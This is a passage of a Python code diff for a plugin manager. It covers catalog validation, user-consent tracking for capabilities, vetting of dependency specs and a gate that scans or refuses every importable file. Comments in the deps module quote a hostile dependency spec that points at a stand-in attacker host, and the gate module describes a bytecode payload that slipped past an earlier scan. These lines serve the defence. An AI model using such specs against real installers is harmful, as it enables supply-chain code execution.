+    ``load_catalog``, and this must answer from the catalog the caller has,
+    not from the one on disk.
+    """
+    data = load_catalog() if catalog is None else catalog
+    return {
+        pack_id: entry
+        for pack_id, entry in data.get("plugins", {}).items()
+        if isinstance(entry, dict) and entry.get("kind") == "builtin"
+    }
+
+
+def available_builtin_packs(
+    *,
+    read_catalog: Callable[[], dict[str, Any]] | None = None,
+    read_lockfile: Callable[[], dict[str, Any]] | None = None,
+) -> list[tuple[str, str]]:
+    """Built-in packs shipped on disk that this install has made no decision about.
+
+    A release can add a pack (``stats`` did), and its files land on disk with
+    the update -- but the server only loads what the lockfile records, and
+    nothing re-syncs it. So the pack is fully installable and completely
+    invisible: the nodes never appear, and no message anywhere says why.
+
+    "No decision" is the operative phrase (#175): a pack the user uninstalled
+    is subtracted too. Before uninstall left a tombstone, the entry was simply
+    popped, so a removed pack was indistinguishable from one this install had
+    never seen -- which is why the notices used to nag about a pack the user
+    had already thrown away, once per start, forever.
+
+    Returns ``(id, display name)`` pairs, sorted, so callers can name them.
+
+    The two readers are injectable because this is the one function the CLI
+    re-exports whose inputs its tests fake by patching ``plugins.load_catalog``
+    / ``plugins.load_lockfile``. They are resolved INSIDE the guard below, so
+    a reader that raises is swallowed like every other failure here.
+    """
+    try:
+        catalog = builtin_catalog_packs(
+            (load_catalog if read_catalog is None else read_catalog)()
+        )
+        lockfile = (
+            plugin_loader.load_lockfile if read_lockfile is None else read_lockfile
+        )()
+        installed = lockfile.get("plugins", {})
+        tombstoned = plugin_loader.removed_ids(lockfile)
+    except Exception:  # never let discoverability break a caller
+        return []
+    out: list[tuple[str, str]] = []
+    for pack_id, entry in catalog.items():
+        if pack_id in installed or pack_id in tombstoned:
+            continue
+        out.append((pack_id, str(entry.get("name") or pack_id)))
+    return sorted(out)
+
+
+@dataclass(frozen=True)
+class CatalogEntry:
+    """One catalog row, in the shape something can render or install from.
+
+    Flat and fully populated on purpose: the caller never has to ask whether
+    a key is present, what type it is this time, or which keys go with which
+    ``kind``. Absent optional values are the empty string or an empty tuple
+    rather than ``None`` so a template can interpolate them directly; ``path``
+    and ``repo`` are the exception, because ``None`` there means "this kind of
+    entry does not have one" and an empty string would read as a real path.
+    """
+
+    id: str
+    name: str
+    description: str
+    kind: str                        # "builtin" | "github"
+    path: str | None = None          # builtin: repo-relative pack directory
+    repo: str | None = None          # github: "owner/repo"
+    ref: str = ""                    # github: tag/branch; "" = default branch
+    homepage: str = ""
+    tags: tuple[str, ...] = ()
+    chapters: tuple[str, ...] = ()
+    official: bool = False
+
+
+def _string_tuple(value: Any) -> tuple[str, ...]:
+    """The string members of *value* when it is a list, else empty."""
+    if not isinstance(value, list):
+        return ()
+    return tuple(item for item in value if isinstance(item, str))
+
+
+def _text(value: Any) -> str:
+    """*value* when it is a string, else the empty string."""
+    return value if isinstance(value, str) else ""
+
+
+def validate_catalog(data: Any) -> dict[str, CatalogEntry]:
+    """The well-formed entries of a parsed ``registry.json``, keyed by id.
+
+    Drops rather than raises, one ``logger.warning`` per casualty. The
+    catalog is data this build ships, so a malformed entry is a bug in a PR
+    that a log line will get fixed -- while raising would mean one bad row
+    empties the Plugin Center, hides the four good packs beside it, and takes
+    ``cdui plugin list`` down with it.
+
+    What gets dropped is what something downstream would otherwise trip over:
+    an id that is not a legal plugin id (it becomes a directory name and a
+    URL segment), a ``kind`` this build cannot install, a ``builtin`` with no
+    directory to activate, and a ``github`` entry whose ``repo`` is not
+    ``owner/repo``. A ``github`` entry WITH a ``path`` is dropped too -- the
+    two kinds are installed by completely different code, and an entry
+    claiming both is a question this module must not answer by guessing.
+    """
+    plugins = data.get("plugins") if isinstance(data, dict) else None
+    if not isinstance(plugins, dict):
+        logger.warning(
+            "plugin catalog has no readable 'plugins' table; treating it as empty"
+        )
+        return {}
+
+    entries: dict[str, CatalogEntry] = {}
+    for plugin_id, entry in plugins.items():
+        if not isinstance(plugin_id, str) or not PLUGIN_ID_RE.match(plugin_id):
+            logger.warning(
+                "plugin catalog: dropping %r -- not a valid plugin id", plugin_id
+            )
+            continue
+        if not isinstance(entry, dict):
+            logger.warning(
+                "plugin catalog: dropping %r -- entry is not a table", plugin_id
+            )
+            continue
+        kind = entry.get("kind")
+        if kind not in _KINDS:
+            logger.warning(
+                "plugin catalog: dropping %r -- unknown kind %r", plugin_id, kind
+            )
+            continue
+        path = entry.get("path")
+        repo = entry.get("repo")
+        if kind == "builtin":
+            if not isinstance(path, str) or not path:
+                logger.warning(
+                    "plugin catalog: dropping %r -- a builtin entry needs a path",
+                    plugin_id,
+                )
+                continue
+            repo = None
+        else:
+            if not isinstance(repo, str) or not _REPO_RE.match(repo):
+                logger.warning(
+                    "plugin catalog: dropping %r -- a github entry needs "
+                    "repo = \"owner/repo\", got %r",
+                    plugin_id,
+                    repo,
+                )
+                continue
+            if path is not None:
+                logger.warning(
+                    "plugin catalog: dropping %r -- a github entry cannot also "
+                    "declare a path",
+                    plugin_id,
+                )
+                continue
+        entries[plugin_id] = CatalogEntry(
+            id=plugin_id,
+            name=_text(entry.get("name")) or plugin_id,
+            description=_text(entry.get("description")),
+            kind=kind,
+            path=path if kind == "builtin" else None,
+            repo=repo,
+            ref=_text(entry.get("ref")),
+            homepage=_text(entry.get("homepage")),
+            tags=_string_tuple(entry.get("tags")),
+            chapters=_string_tuple(entry.get("chapters")),
+            official=bool(entry.get("official", False)),
+        )
+    return entries
+
+
+def catalog_entries() -> dict[str, CatalogEntry]:
+    """Every well-formed catalog entry this install has, keyed by id."""
+    return validate_catalog(load_catalog())
+
+
+def github_catalog_packs() -> list[CatalogEntry]:
+    """The catalog's ``kind = "github"`` entries, sorted by id.
+
+    Empty in a stock build: the catalog ships only in-repo packs today. It is
+    here because the shape is already in the schema, and a Plugin Center that
+    lists third-party packs must not have to re-derive what one looks like.
+    """
+    return sorted(
+        (entry for entry in catalog_entries().values() if entry.kind == "github"),
+        key=lambda entry: entry.id,
+    )
+
+
+def catalog_entry(plugin_id: str) -> CatalogEntry | None:
+    """One entry by id, case-insensitively, or ``None``.
+
+    Case-insensitive because that is how the id arrives -- typed at a prompt
+    or taken off a URL -- and every id in the catalog is lower-case by
+    :data:`~app.core.plugins.manifest.PLUGIN_ID_RE`, so lowering the query is
+    the whole of the match.
+    """
+    return catalog_entries().get(plugin_id.lower())

--- a/backend/app/core/plugins/consent.py
+++ b/backend/app/core/plugins/consent.py
@@ -36,9 +36,9 @@ from .errors import ConsentRequired
 class Decision:
     """What a capability request comes to, given what is already agreed.
 
-    ``granted`` and ``missing`` partition the request, both in the order the
-    manifest asked -- a dialog lists them next to the manifest and a list
-    that has been re-sorted reads as a different request.
+    ``granted`` and ``missing`` partition the request, both in the order it
+    was made -- a dialog lists them beside the plugin's own declaration,
+    and a list re-ordered on the way reads as a different request.
 
     ``reused_prior`` is true when at least one capability is granted only
     because of an earlier install. It is the difference between "you already

--- a/backend/app/core/plugins/consent.py
+++ b/backend/app/core/plugins/consent.py
@@ -1,0 +1,135 @@
+"""Who has agreed to what, decided apart from who is doing the asking.
+
+Two permissions travel with a plugin and neither is a sandbox. A capability
+(``network``, ``filesystem``, ...) is a DECLARATION: once granted, the plugin
+may use that whole family of modules and nothing intercepts it again.
+``allowed_modules`` is narrower and blunter -- it turns the AST gate off for
+the modules it names. Both are decisions only a person can make, which is
+exactly why the arithmetic behind them has to be somewhere a person is not.
+
+The CLI asks at a ``[y/N]`` prompt; a Plugin Center has to ask in a dialog
+with a list and two buttons. What they must agree on is the ANSWER: which
+capabilities are covered already, which are still outstanding, and -- the
+one an update turns on -- which are new since the version the user actually
+consented to. Capability creep across an update is the supply-chain shape a
+plugin manager can realistically catch, and it is only visible by comparing
+against the prior grant, so :class:`Decision` carries that comparison rather
+than leaving each caller to redo it.
+
+``prior=None`` and ``prior=()`` are different questions. ``None`` is "there
+is no earlier install"; the empty tuple is "there is one and it was granted
+nothing", which is what makes ``grew`` mean something on a first install
+(nothing) and on an update (everything new). Nothing here prints, prompts or
+raises for a capability -- :func:`decide_capabilities` describes, and the
+caller decides what to do about it.
+"""
+
+from __future__ import annotations
+
+from collections.abc import Iterable
+from dataclasses import dataclass
+
+from .errors import ConsentRequired
+
+
+@dataclass(frozen=True)
+class Decision:
+    """What a capability request comes to, given what is already agreed.
+
+    ``granted`` and ``missing`` partition the request, both in the order the
+    manifest asked -- a dialog lists them next to the manifest and a list
+    that has been re-sorted reads as a different request.
+
+    ``reused_prior`` is true when at least one capability is granted only
+    because of an earlier install. It is the difference between "you already
+    said yes to this" and "you are saying yes now", and the caller owes the
+    user the first sentence when it is true.
+
+    ``grew`` is what this version asks for beyond the last one. Empty when
+    there was no last one.
+    """
+
+    granted: tuple[str, ...]
+    missing: tuple[str, ...]
+    reused_prior: bool
+    grew: tuple[str, ...]
+
+
+def decide_capabilities(
+    requested: Iterable[str],
+    *,
+    accepted: Iterable[str] | None = None,
+    prior: Iterable[str] | None = None,
+) -> Decision:
+    """Split *requested* into what is covered and what is still outstanding.
+
+    *accepted* is what the user is agreeing to right now (a checked list in a
+    dialog, or everything the manifest asked for behind
+    ``--accept-capabilities``); *prior* is what an earlier install of the
+    same plugin recorded. Either covers a capability, and a capability
+    covered only by *prior* sets ``reused_prior`` -- the caller has to say so
+    rather than let a re-grant pass unmentioned.
+
+    Pass ``prior=None`` when there is no earlier install. With a prior, every
+    capability not in it is ``grew``, whether or not it ends up granted:
+    "this version asks for more than the one you agreed to" is true before
+    anybody decides what to do about it.
+    """
+    asked = tuple(requested)
+    accepted_set = set(accepted or ())
+    prior_set = set(prior or ())
+    granted: list[str] = []
+    missing: list[str] = []
+    reused_prior = False
+    for capability in asked:
+        if capability in accepted_set:
+            granted.append(capability)
+        elif capability in prior_set:
+            granted.append(capability)
+            reused_prior = True
+        else:
+            missing.append(capability)
+    grew = (
+        ()
+        if prior is None
+        else tuple(c for c in asked if c not in prior_set)
+    )
+    return Decision(
+        granted=tuple(granted),
+        missing=tuple(missing),
+        reused_prior=reused_prior,
+        grew=grew,
+    )
+
+
+def check_trust(
+    allowed_modules: Iterable[str],
+    *,
+    trust_author: bool,
+    prior_trusted: Iterable[str] | None = None,
+) -> None:
+    """Raise unless the user has agreed to this plugin's ``allowed_modules``.
+
+    ``allowed_modules`` is the switch that stops the AST gate refusing the
+    named imports, so there is no partial answer: either the author is
+    trusted for all of them or the install does not happen. That is why this
+    returns nothing and raises :class:`~.errors.ConsentRequired` carrying the
+    whole list -- the caller's next move is to show the list and ask, and a
+    boolean would leave it to re-derive what to show.
+
+    A plugin that asks for nothing needs no trust, and an update whose module
+    list is covered by what the user already trusted is not a second
+    decision. Anything more than the prior list is.
+    """
+    modules = tuple(allowed_modules)
+    if not modules or trust_author:
+        return
+    already = set(prior_trusted or ())
+    if all(module in already for module in modules):
+        return
+    raise ConsentRequired(
+        "Plugin requests modules outside the default allowlist: "
+        f"{', '.join(modules)}.",
+        missing_capabilities=(),
+        allowed_modules=modules,
+    )

--- a/backend/app/core/plugins/deps.py
+++ b/backend/app/core/plugins/deps.py
@@ -1,0 +1,89 @@
+"""``[python_deps]``, vetted before it can reach a package installer.
+
+This is the narrowest and least negotiable rule in the package. A manifest's
+``[python_deps]`` table is written by whoever wrote the plugin, and the
+installer hands it to ``uv pip install`` -- so ``evil = "@ git+https://
+attacker.example/evil"`` is arbitrary code execution through the dependency
+resolver, running the attacker's ``setup.py`` no matter how strict the AST
+gate over the plugin's own files was. No shell is involved and none is
+needed: ``uv`` will fetch a URL specifier if you give it one.
+
+So a name and a version constraint are matched against two deliberately
+conservative patterns and anything else is refused BY NAME. Refusing is not
+filtering: the offending key travels back to the caller, because "one of
+your dependencies was dropped" is how a plugin ends up half-installed and
+failing on its first import instead of at the point somebody could fix it.
+
+Nothing here runs a subprocess. Turning a vetted spec into an install is the
+installer's job; this module only decides what a spec may look like.
+"""
+
+from __future__ import annotations
+
+import re
+
+from .errors import PluginInstallError
+
+# PEP 508 distribution names: letters / digits / underscore / hyphen / period.
+# Anything else (especially ``@``, ``git+``, ``http``, whitespace, semicolon)
+# is rejected to block supply-chain RCE via the dep installer
+# (``"evil @ git+https://attacker.com/evil"`` -> ``uv pip install`` runs the
+# attacker's ``setup.py`` regardless of how strict the AST gate is).
+_SAFE_DEP_NAME = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]{0,62}$")
+
+# PEP 440 version specifier characters. We don't fully parse -- we just refuse
+# anything that *isn't* whitespace, digits, dots, commas, parens, and the
+# canonical comparison operators.
+_SAFE_DEP_VERSION = re.compile(r"^[\s\d.,()<>=!~*+a-zA-Z\-]*$")
+
+
+class _UnsafeDepSpec(ValueError):
+    """Raised when a plugin manifest's python_deps entry isn't a plain
+    distribution name + version constraint."""
+
+
+def _build_dep_spec(name: str, ver: str) -> str:
+    """Turn a (name, version) pair into a vetted ``foo==1.2.3``-style string.
+
+    Rejects PEP 508 extras (``foo[extra]``), URL specifiers (``foo @ url``),
+    and any name with non-distribution-safe characters. Returning the spec as
+    a list element for ``uv pip install`` is safe because we never invoke a
+    shell -- but ``uv`` itself would happily fetch ``git+`` URLs given the
+    chance, and that's exactly what we're blocking here.
+    """
+    if not isinstance(name, str) or not _SAFE_DEP_NAME.match(name):
+        raise _UnsafeDepSpec(
+            f"Invalid python_deps name {name!r} -- must match {_SAFE_DEP_NAME.pattern!r}"
+        )
+    if not isinstance(ver, str):
+        ver = ""
+    if ver and not _SAFE_DEP_VERSION.match(ver):
+        raise _UnsafeDepSpec(
+            f"Invalid python_deps version constraint for {name!r}: {ver!r}"
+        )
+    if not ver:
+        return name
+    if ver[:1] in (">", "<", "=", "~", "!"):
+        return f"{name}{ver}"
+    return f"{name}=={ver}"
+
+
+def dep_specs(deps: dict[str, str]) -> list[str]:
+    """Every dependency of a manifest as a vetted install spec, in order.
+
+    Raises :class:`~.errors.PluginInstallError` on the first entry that does
+    not vet, with the offending key as the ``hint`` -- a dialog can then
+    point at the line of the manifest to fix instead of asking its reader to
+    match a name out of a sentence.
+
+    Order is the manifest's. Nothing here resolves or sorts anything: the
+    installer is entitled to show the list it is about to install and have it
+    read like the table it came from.
+    """
+    specs: list[str] = []
+    for name, ver in deps.items():
+        try:
+            specs.append(_build_dep_spec(name, ver))
+        except _UnsafeDepSpec as exc:
+            raise PluginInstallError(str(exc), hint=str(name)) from exc
+    return specs

--- a/backend/app/core/plugins/errors.py
+++ b/backend/app/core/plugins/errors.py
@@ -1,0 +1,160 @@
+"""What can go wrong between a typed source and an installed plugin.
+
+The CLI answers each of these with two lines of bilingual prose and an exit
+code, because a terminal has nowhere else to put the detail. A GUI cannot do
+that: "install failed" with a pip log folded into the sentence is a dead end
+in a dialog, and re-deriving what happened by matching on message text is how
+a translated string turns into a broken button.
+
+So the REASON is carried in attributes and the PROSE stays with whoever is
+talking to the user. ``UnknownCatalogName`` knows the spec, the ids this
+install really has and where its catalog file lives; the CLI turns that into
+the same four-line bilingual message it has always printed, and a route can
+turn the identical exception into a list the frontend renders. Neither one
+has to parse the other's sentence.
+
+The base classes are chosen so that no existing ``except`` clause has to
+change. ``ManifestError`` and ``SourceError`` are ``ValueError`` subclasses
+because ``validate_manifest`` and ``parse_source`` have always raised
+``ValueError`` and their callers still catch it; ``PluginInstallError`` is a
+``RuntimeError`` for the same reason on the install side.
+
+Stdlib only, and imported by ``plugins/__init__.py``: a caller that only
+wants to catch a plugin failure never has to drag the installer, the AST gate
+or the network in to do it.
+"""
+
+from __future__ import annotations
+
+from collections.abc import Iterable
+from pathlib import Path
+
+
+class PluginInstallError(RuntimeError):
+    """Installing a plugin failed. ``hint`` is the operator-facing detail.
+
+    The hint is the last lines of whatever went wrong -- pip's output, a
+    tarball error -- which is what a learner pastes into an issue and what a
+    teacher reads first. It is deliberately separate from the message so a
+    UI can show one line and keep the other behind a disclosure.
+    """
+
+    def __init__(self, message: str, *, hint: str | None = None):
+        super().__init__(message)
+        self.hint = hint
+
+
+class PluginCancelled(Exception):
+    """The install was cancelled. NOT a failure.
+
+    It is the system doing as it was told, so it deliberately does not
+    inherit from :class:`PluginInstallError`: no ``except PluginInstallError``
+    may report a cancel as something that went wrong.
+    """
+
+
+class PluginNeedsRestart(PluginInstallError):
+    """This install cannot finish inside the running server.
+
+    ``command`` is what to run instead, spelled out in full: a message that
+    says "restart required" without saying what to type leaves the user to
+    guess at a CLI they have never run.
+    """
+
+    def __init__(self, message: str, *, command: str, hint: str | None = None):
+        super().__init__(message, hint=hint)
+        self.command = command
+
+
+class ConsentRequired(PluginInstallError):
+    """The install stopped at a decision only the user can make.
+
+    Two shapes of consent, one exception, because the caller's next move is
+    the same for both: show what is being asked for and ask. The CLI asks at
+    a prompt (``capability_gate``, ``--trust-author``); a GUI has to ask in a
+    dialog, and it can only build that dialog from a list -- which is why
+    ``missing_capabilities`` and ``allowed_modules`` are tuples of names
+    rather than a sentence naming them.
+
+    An install error rather than a sibling of :class:`PluginCancelled`: the
+    install did not complete, and a caller that only knows "install errors"
+    must not silently treat an ungranted capability as success.
+    """
+
+    def __init__(
+        self,
+        message: str,
+        *,
+        missing_capabilities: Iterable[str] = (),
+        allowed_modules: Iterable[str] = (),
+        hint: str | None = None,
+    ):
+        super().__init__(message, hint=hint)
+        self.missing_capabilities = tuple(missing_capabilities)
+        self.allowed_modules = tuple(allowed_modules)
+
+
+class SourceError(ValueError):
+    """What the user typed cannot be turned into something to install.
+
+    A ``ValueError`` on purpose: ``parse_source`` has raised one since it
+    existed and every caller -- ``cmd_install``, ``cmd_info``,
+    ``scripts/project.py`` -- still catches ``ValueError`` around it. Making
+    the structured version a subclass means those keep working untouched.
+    """
+
+
+class UnknownCatalogName(SourceError):
+    """A bare word this install's catalog has never heard of.
+
+    Its own class because the generic "expected a catalog name, owner/repo or
+    a URL" is a dead end here: the user *did* type a catalog name, and what
+    they cannot see is that their copy of ``registry.json`` does not have it
+    (usually an install old enough to predate the pack). Answering that needs
+    the ids this install really has and the file they were read from, so both
+    travel with the exception instead of being re-derived by each caller.
+    """
+
+    def __init__(self, spec: str, known: Iterable[str], catalog_path: Path):
+        self.spec = spec
+        self.known = tuple(known)
+        self.catalog_path = catalog_path
+        super().__init__(
+            f"no plugin pack named {spec!r} in the catalog at {catalog_path}"
+        )
+
+
+class UnparseableSource(SourceError):
+    """Not a catalog name, not ``owner/repo``, not a GitHub URL.
+
+    Carries only the spec: there is nothing else true to say about it, and
+    the suggestion of what to type instead depends on the catalog the caller
+    is showing, not on this failure.
+    """
+
+    def __init__(self, spec: str):
+        self.spec = spec
+        super().__init__(f"could not parse plugin source {spec!r}")
+
+
+class GitHubError(RuntimeError):
+    """Resolving or downloading from GitHub failed.
+
+    ``status`` is the HTTP status when there was one and ``None`` when the
+    request never got that far (DNS, TLS, a timeout). The difference is the
+    user's next step -- a 404 is a typo in the repo name, a missing status is
+    the network -- and it is not recoverable from the message text.
+    """
+
+    def __init__(self, message: str, *, status: int | None = None):
+        super().__init__(message)
+        self.status = status
+
+
+class ManifestError(ValueError):
+    """A ``cdui.plugin.toml`` this build will not install.
+
+    A ``ValueError`` for the same reason :class:`SourceError` is: every
+    ``except ValueError`` around ``validate_manifest`` -- in the CLI and in
+    the tests -- predates this class and keeps working.
+    """

--- a/backend/app/core/plugins/gate.py
+++ b/backend/app/core/plugins/gate.py
@@ -1,0 +1,342 @@
+"""The gate: nothing gets imported that nobody has read.
+
+A plugin is code the user chose to install, from a stranger, that the server
+then imports at full trust into its own process. The AST validator in
+``app.core.plugin_validator`` decides what a source file may say; this module
+decides WHICH FILES it is asked about, and that is the half that has failed
+open twice.
+
+Both failures were the same mistake -- reasoning about what a directory or a
+filename conventionally holds instead of asking what Python's import system
+can reach:
+
+* core#182: the walk covered ``nodes/`` while ``install_plugin_finder``
+  hands the WHOLE plugin directory to a namespace package's ``__path__``, so
+  ``from ..tests import payload`` pulled in unscanned code at full trust.
+* core#220: the walk globbed ``*.py`` while the loader accepts every suffix
+  in ``importlib.machinery.all_suffixes()``, so a pack shipping
+  ``nodes/helper.pyc`` and no ``helper.py`` was never scanned at all. Not the
+  gate failing open on a rule -- the gate never running, which is worse.
+
+So the rule here is a single sentence: every file under the plugin root that
+an ``import`` statement could resolve is either SCANNED as source or REFUSED
+by name. There is no third outcome, and "walked past it" is the bug both
+issues were.
+
+Moved out of ``scripts/plugins.py`` unchanged. It is the same gate on the
+same files whether an install came from the CLI or from a route, and two
+copies of it would be two answers to "was this code looked at?".
+"""
+
+from __future__ import annotations
+
+import importlib.machinery
+from collections.abc import Iterable
+from pathlib import Path
+
+from app.core.plugin_validator import PluginValidationError, validate_python_source
+from app.core.script_policy import TIER0_DENIED_ATTRS
+
+__all__ = [
+    "LOADER_SUFFIXES",
+    "SCANNABLE_SUFFIXES",
+    "PluginValidationError",
+    "loader_suffix",
+    "validate_nodes_dir",
+    "validate_plugin_dir",
+]
+
+
+def _denied_attributes_for(allowed_modules: list[str]) -> frozenset[str]:
+    """core#179's ``denied_attributes`` set, lifted at Tier 2.
+
+    A method on a value a Tier-0 import hands back (``numpy.zeros(3).dump(
+    path)``) is an arbitrary file write with zero capability declared: the
+    blocklist gate is keyed on Import nodes, so it never sees what an
+    allowed library's return value can do. Already closed for in-canvas
+    scripts via ``TIER0_DENIED_ATTRS`` passed as ``denied_attributes``; this
+    is the same constant, not a re-derived smaller list, so the two surfaces
+    cannot drift on what "closed" means. Deliberately NOT
+    ``SCRIPT_PROXY_DENIED_ATTRS``, which also folds in the module-gateway
+    attrs (``.hub``'s sibling problem, not this one) and the RCE leaves as
+    attributes -- both closed for scripts for reasons specific to an
+    allowlisted, unreviewed surface that do not hold for a file the user
+    chose to install.
+
+    Lifted entirely at Tier 2 (``allowed_modules`` non-empty, which only
+    happens once ``--trust-author`` has already been accepted -- see
+    ``_install_github``, which refuses to call either caller of this
+    function with a non-empty ``allowed`` otherwise). Closing these at Tier
+    0/1 is right: a plugin that declared nothing, or only a capability, gets
+    no new file-write / remote-fetch-and-execute surface for free, and
+    before core#179 a plugin could not even define a method named ``save``
+    without failing installation outright. Refusing them at Tier 2 is
+    incoherent, and the dunder/RCE-leaf precedent (never lifted by any
+    tier -- see the walker's own denied-attrs handling) does not transfer:
+    those rules refuse REFLECTION, which core#133's own docs say no
+    capability ever buys. ``.dump`` / ``.hub`` / ``.save`` are not
+    reflection -- they are file writes and remote code fetches, and
+    ``--trust-author`` has already granted an equivalent or greater version
+    of both by a shorter route (bare ``subprocess`` reaches further than
+    ``numpy.save`` ever could), so refusing the narrower path while granting
+    the wider one protects nothing.
+    """
+    return frozenset() if allowed_modules else TIER0_DENIED_ATTRS
+
+
+# ── core#220: the walk covers what the LOADER covers, by extension ─────────
+#
+# ``validate_plugin_dir`` used to enumerate ``*.py``. The loader imports more
+# than that: ``plugin_loader.install_plugin_finder`` sets the synthetic
+# package's ``__path__`` to the plugin directory, which puts the stock
+# ``FileFinder`` loaders in charge, and those accept every suffix in
+# ``importlib.machinery.all_suffixes()``. Verified on a real interpreter, not
+# reasoned about -- a plugin whose ``nodes/`` held only ``helper.pyc``,
+# ``w.pyw`` and ``native.cp314-win_amd64.pyd``::
+#
+#     loader suffixes:        ['.py', '.pyw', '.pyc', '.cp314-win_amd64.pyd', '.pyd']
+#     files a *.py glob sees: ['__init__.py']            (i.e. none of them)
+#     pkgutil reports:        ['helper', 'native', 'w']  (i.e. all of them)
+#     validate_plugin_dir():  ACCEPTED, no exception
+#
+# ...and the ``.pyc`` then imported and ran its ``os.system`` payload. That is
+# not the gate failing open on a rule; it is the gate never running, which is
+# strictly worse and is why this is keyed on the interpreter's own answer
+# rather than on a hardcoded list -- the same "ask, don't assume" move
+# ``_compute_os_path_module_leaves`` makes for ``os.path``.
+#
+# ``.pyw`` and the extension suffixes are unioned in explicitly ON TOP of
+# ``all_suffixes()`` because that function answers for the CURRENT
+# interpreter, and a tarball is not installed on the machine that built it:
+# ``.pyw`` is a source suffix only on Windows, and ``.so`` / ``.pyd`` /
+# ``.dylib`` each exist on exactly one platform. Scanning the union means the
+# verdict on a given tarball does not depend on which OS ran the installer.
+_EXTRA_SOURCE_SUFFIXES = frozenset({".pyw"})
+_CROSS_PLATFORM_BINARY_SUFFIXES = frozenset({
+    ".pyc", ".pyo", ".pyd", ".so", ".dylib",
+})
+
+#: Suffixes that are Python SOURCE and can therefore be handed to the AST
+#: gate. ``.pyw`` is ordinary Python text -- only the launcher treats it
+#: differently -- so it is scanned, not refused.
+SCANNABLE_SUFFIXES: frozenset[str] = (
+    frozenset(importlib.machinery.SOURCE_SUFFIXES) | _EXTRA_SOURCE_SUFFIXES
+)
+
+#: Every suffix an ``import`` statement can resolve to a file, anywhere this
+#: tarball might be installed. Asserted against ``all_suffixes()`` by a
+#: standing test, so a future CPython that grows a loader suffix fails loudly
+#: instead of silently widening the hole this closed.
+LOADER_SUFFIXES: frozenset[str] = (
+    frozenset(importlib.machinery.all_suffixes())
+    | SCANNABLE_SUFFIXES
+    | _CROSS_PLATFORM_BINARY_SUFFIXES
+)
+
+
+def loader_suffix(path: Path) -> str | None:
+    """The loader suffix *path* would be imported under, or ``None``.
+
+    Longest match wins, because the extension suffixes nest:
+    ``native.cp314-win_amd64.pyd`` ends with both ``.cp314-win_amd64.pyd``
+    and ``.pyd``, and the longer one is the right answer twice over -- it is
+    what the refusal message should name, and stripping only ``.pyd`` would
+    leave a stem of ``native.cp314-win_amd64``, which the identifier test in
+    :func:`_names_an_importable_module` would then wave through.
+
+    A name that is ONLY a suffix (a file literally called ``.py``) answers
+    ``None``: the stem would be empty, so there is no module name for an
+    ``import`` statement to spell.
+    """
+    name = path.name
+    best: str | None = None
+    for suffix in LOADER_SUFFIXES:
+        if len(name) > len(suffix) and name.endswith(suffix):
+            if best is None or len(suffix) > len(best):
+                best = suffix
+    return best
+
+
+def _names_an_importable_module(path: Path, suffix: str) -> bool:
+    """Whether an ``import`` statement could name the module *path* holds.
+
+    The same structural question ``_VALIDATION_SKIP_DIRS`` asks about
+    ``.git``, applied to a FILE: strip the loader suffix and ask whether what
+    is left is a valid Python identifier. If it is not, no import statement
+    -- absolute or relative -- can name it, so nothing can reach it.
+
+    This exists for exactly one shape, and getting it wrong in either
+    direction is a real failure, so it was verified rather than reasoned
+    about. CPython writes its own bytecode cache as
+    ``__pycache__/real.cpython-314.pyc``; an attacker writes
+    ``__pycache__/payload.pyc``. Both are ``.pyc`` files in the same
+    directory, and they are not the same thing::
+
+        __pycache__/payload.pyc            stem 'payload'          identifier
+        __pycache__/real.cpython-314.pyc   stem 'real.cpython-314' NOT
+
+        pkgutil.iter_modules(__pycache__)          -> ['payload']
+        import <pkg>.nodes.__pycache__.payload     -> OK, ran the bytecode
+        import <pkg>.nodes.__pycache__.real        -> ModuleNotFoundError
+
+    So the refusal has to fire on the first and must NOT fire on the second:
+    a plugin directory that any interpreter has ever imported from has a
+    ``__pycache__`` full of the second kind, including this repo's own
+    built-in packs, and refusing to install over an ordinary compilation
+    artifact would be a false positive with no matching security value.
+
+    Applied only to the suffixes that get REFUSED. Source files are scanned
+    whatever they are called: scanning is never wrong, and the previous
+    ``*.py`` glob scanned an unimportably-named ``my-node.py`` too.
+    """
+    return path.name[: -len(suffix)].isidentifier()
+
+
+def _validate_importable_tree(
+    root: Path,
+    allowed_modules: list[str],
+    capabilities: Iterable[str],
+    *,
+    skip_dirs: frozenset[str] = frozenset(),
+) -> None:
+    """AST-scan every importable source file under *root*; refuse the rest.
+
+    "The rest" is the whole point. A ``.pyc`` cannot be AST-scanned without
+    decompiling it and a ``.pyd`` / ``.so`` cannot be scanned even in
+    principle, so the only two honest answers are "refuse" and "import
+    unexamined code at full trust". This picks the first, by name, with a
+    message that says which file and why -- never a silent skip, which is
+    exactly what the ``*.py`` glob was doing.
+    """
+    if not root.exists():
+        return
+    root_resolved = root.resolve()
+    for path in sorted(root.rglob("*")):
+        if not path.is_file():
+            continue
+        rel_parts = path.resolve().relative_to(root_resolved).parts
+        if skip_dirs and any(part in skip_dirs for part in rel_parts):
+            continue
+        suffix = loader_suffix(path)
+        if suffix is None:
+            continue
+        rel = "/".join(rel_parts)
+        if suffix not in SCANNABLE_SUFFIXES:
+            if not _names_an_importable_module(path, suffix):
+                continue
+            raise PluginValidationError(
+                f"'{rel}' cannot be installed: Python's import system loads "
+                f"'{suffix}' files, but they are compiled rather than source, "
+                f"so the security scan cannot look inside one. Every file a "
+                f"plugin can have imported has to be readable as source -- "
+                f"ship the '.py' this was built from instead"
+            )
+        content = path.read_bytes()
+        if not content.strip():
+            continue
+        validate_python_source(
+            content,
+            path.name,
+            allowed_modules=allowed_modules,
+            capabilities=list(capabilities),
+            denied_attributes=_denied_attributes_for(allowed_modules),
+        )
+
+
+def validate_nodes_dir(
+    nodes_dir: Path,
+    allowed_modules: list[str],
+    capabilities: Iterable[str] = (),
+) -> None:
+    _validate_importable_tree(nodes_dir, allowed_modules, capabilities)
+
+
+# Directories within an extracted plugin tarball that are *not* reachable
+# through Python's import system, whatever the loader's ``__path__`` covers --
+# safe to skip the AST gate because there is no route from an ``import``
+# statement to a file in here. Everything else -- ``examples/``, ``tests/``,
+# ``docs/``, ``assets/``, ``__pycache__``, any other top-level helper -- gets
+# scanned, because ``plugin_loader.install_plugin_finder`` registers the
+# WHOLE plugin directory as a PEP-420 namespace package's ``__path__`` (not
+# only ``nodes/``), so ``from .. import _helpers`` -- or ``from ..tests
+# import payload`` -- from inside a scanned ``nodes/foo.py`` would otherwise
+# pull in unscanned code at full trust, automatically, at server boot or
+# reload (core#182).
+#
+# ``__pycache__`` is deliberately NOT on this set, despite an earlier version
+# of this comment claiming it was safe to skip because "a real __pycache__
+# never holds a *.py this glob would match." That is true of the directory
